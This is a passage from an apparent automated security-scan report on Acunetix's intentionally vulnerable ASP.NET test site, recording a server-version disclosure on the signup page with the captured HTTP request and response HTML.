value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgQeBFRleHQFElJlYWQgdXNlciBjb21tZW50cx4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9M2RkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGSaJVtdRqrIb4g8/ZtiayAG6OnQCA==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyytPMBgL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMJd1ucUfNI8x3o4I+C+TrBHqvCj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Signup.aspx
Method	POST
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 407 bytes.	POST http://testaspnet.vulnweb.com/Signup.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/Signup.aspx Content-Length: 1060 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,060 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLWF2wpV006tz0eDdoKfDbx%2Bi81I&__VIEWSTATEGENERATOR=36F90C25&__EVENTVALIDATION=%2FwEWWgK42oW1DwLStq24BwK3jsrkBALF97vxAQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBIIkG35ZBK5ERiGTc%2BmKdRBm3AUE&tbUsername=ZAP&tbPassword=ZAP&btnSignup=Sign+me+up
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13329
Response Body - size: 13,329 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Signup</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Signup.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTY0MzI4NjU4Mw9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPZBYCAgcPDxYEHgRUZXh0BT9TdWJzY3JpcHRpb24gc3VjY2Vzc2Z1bGwuIFBsZWFzZSB2aXNpdCB0aGUgbG9naW4gcGFnZSB0byBsb2dpbi4fAmdkZGRj/ih5dbVl0OMxvkohxyr8Ec4YAg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="36F90C25" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWgLK64j5AgLStq24BwK3jsrkBALF97vxAQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBBsKql/xMtNSXxlEXNG8K/C7XIc2" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <TABLE id="Table2" cellSpacing="0" cellPadding="10" width="300" border="0" class="FramedForm" align="center"> <TR> <TD>Username:</TD> <TD> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnSignup" value="Sign me up" id="btnSignup" /></TD> </TR> </TABLE> <BR> <span id="lblStatus">Subscription successfull. Please visit the login page to login.</span> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a 